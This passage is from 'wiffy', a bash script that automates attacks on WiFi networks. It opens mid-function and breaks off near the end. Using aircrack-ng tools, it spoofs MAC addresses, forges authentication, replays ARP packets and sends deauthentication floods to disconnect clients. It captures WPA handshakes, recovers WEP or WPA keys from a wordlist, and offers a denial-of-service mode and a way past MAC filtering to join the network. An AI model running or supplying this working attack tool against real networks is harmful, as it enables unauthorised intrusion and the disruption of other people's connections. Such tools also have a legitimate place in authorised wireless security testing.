[ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action 